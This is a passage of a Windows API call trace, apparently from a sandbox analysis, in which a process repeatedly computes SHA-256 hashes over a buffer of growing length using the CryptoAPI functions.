(hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0186.670] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.670] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85710 [0186.671] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e85710, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85710, pdwDataLen=0xcdf6c) returned 1 [0186.671] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.671] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.671] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.671] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.671] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0186.671] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.671] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e858f0 [0186.671] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x2, pbData=0x32e858f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e858f0, pdwDataLen=0xcdf6c) returned 1 [0186.671] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.671] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.671] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.672] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.672] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0186.672] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85ce0 [0186.672] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85ce0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85ce0, pdwDataLen=0xcdf6c) returned 1 [0186.672] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.672] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.672] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.673] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.673] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0186.673] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.673] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e852c0 [0186.673] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e852c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e852c0, pdwDataLen=0xcdf6c) returned 1 [0186.673] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.673] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.673] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0186.673] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.673] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0186.673] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.673] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85cb0 [0186.673] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e85cb0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85cb0, pdwDataLen=0xcdf6c) returned 1 [0186.673] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.673] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.674] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0186.674] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.674] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0186.674] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85530 [0186.674] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e85530, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85530, pdwDataLen=0xcdf6c) returned 1 [0186.674] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.674] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0186.674] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0186.675] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.675] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0186.675] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85d10 [0186.675] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e85d10, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85d10, pdwDataLen=0xcdf6c) returned 1 [0186.675] CryptDestroyHash (hHash=0x3396f740) returned 1 [0186.675] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0186.675] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.676] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.676] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0186.676] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e853e0 [0186.676] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e853e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e853e0, pdwDataLen=0xcdf6c) returned 1 [0186.676] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.676] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.676] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0186.676] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.676] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0186.676] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85800 [0186.676] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85800, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85800, pdwDataLen=0xcdf6c) returned 1 [0186.676] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.676] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0186.676] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.677] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.677] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0186.677] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.677] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85380 [0186.677] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85380, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85380, pdwDataLen=0xcdf6c) returned 1 [0186.677] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.677] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.677] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.678] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.678] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0186.678] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.678] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85b30 [0186.678] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85b30, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85b30, pdwDataLen=0xcdf6c) returned 1 [0186.678] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.678] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0186.678] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0186.678] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.678] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0186.678] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e859e0 [0186.679] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e859e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e859e0, pdwDataLen=0xcdf6c) returned 1 [0186.679] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.679] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0186.679] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.680] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.680] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0186.680] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85890 [0186.680] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x2, pbData=0x32e85890, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85890, pdwDataLen=0xcdf6c) returned 1 [0186.680] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.680] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.680] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.681] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.681] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0186.681] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85b00 [0186.681] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e85b00, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85b00, pdwDataLen=0xcdf6c) returned 1 [0186.681] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.681] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0186.681] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.681] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.681] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0186.681] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.681] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85c50 [0186.681] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e85c50, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85c50, pdwDataLen=0xcdf6c) returned 1 [0186.681] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0186.681] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.681] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.684] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.684] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0186.684] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e856e0 [0186.684] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e856e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e856e0, pdwDataLen=0xcdf6c) returned 1 [0186.684] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.684] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.684] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0186.685] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.685] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0186.685] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.685] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85bc0 [0186.685] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85bc0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85bc0, pdwDataLen=0xcdf6c) returned 1 [0186.685] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.685] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0186.685] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.686] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.686] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0186.686] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85950 [0186.686] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e85950, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85950, pdwDataLen=0xcdf6c) returned 1 [0186.686] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.686] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.686] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.686] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.686] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0186.686] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85470 [0186.686] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x2, pbData=0x32e85470, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85470, pdwDataLen=0xcdf6c) returned 1 [0186.686] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.686] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.686] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.688] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.688] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0186.688] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85e90 [0186.688] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e85e90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85e90, pdwDataLen=0xcdf6c) returned 1 [0186.688] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0186.688] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.688] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0186.689] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.689] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0186.689] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85590 [0186.689] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e85590, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85590, pdwDataLen=0xcdf6c) returned 1 [0186.689] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.689] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0186.689] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.690] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.690] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0186.690] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85740 [0186.690] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e85740, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85740, pdwDataLen=0xcdf6c) returned 1 [0186.690] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.690] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.690] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.690] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.690] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0186.691] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.691] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e853b0 [0186.691] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e853b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e853b0, pdwDataLen=0xcdf6c) returned 1 [0186.691] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.691] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.691] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.691] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.691] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0186.691] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.691] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85620 [0186.691] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x2, pbData=0x32e85620, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85620, pdwDataLen=0xcdf6c) returned 1 [0186.691] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.691] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.691] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.692] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.692] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0186.692] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.692] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e858c0 [0186.692] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e858c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e858c0, pdwDataLen=0xcdf6c) returned 1 [0186.692] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.692] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.692] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.693] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, 